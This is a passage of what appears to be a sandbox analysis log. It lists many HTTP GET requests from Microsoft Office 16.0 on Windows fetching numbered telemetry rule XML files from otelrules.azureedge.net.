        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
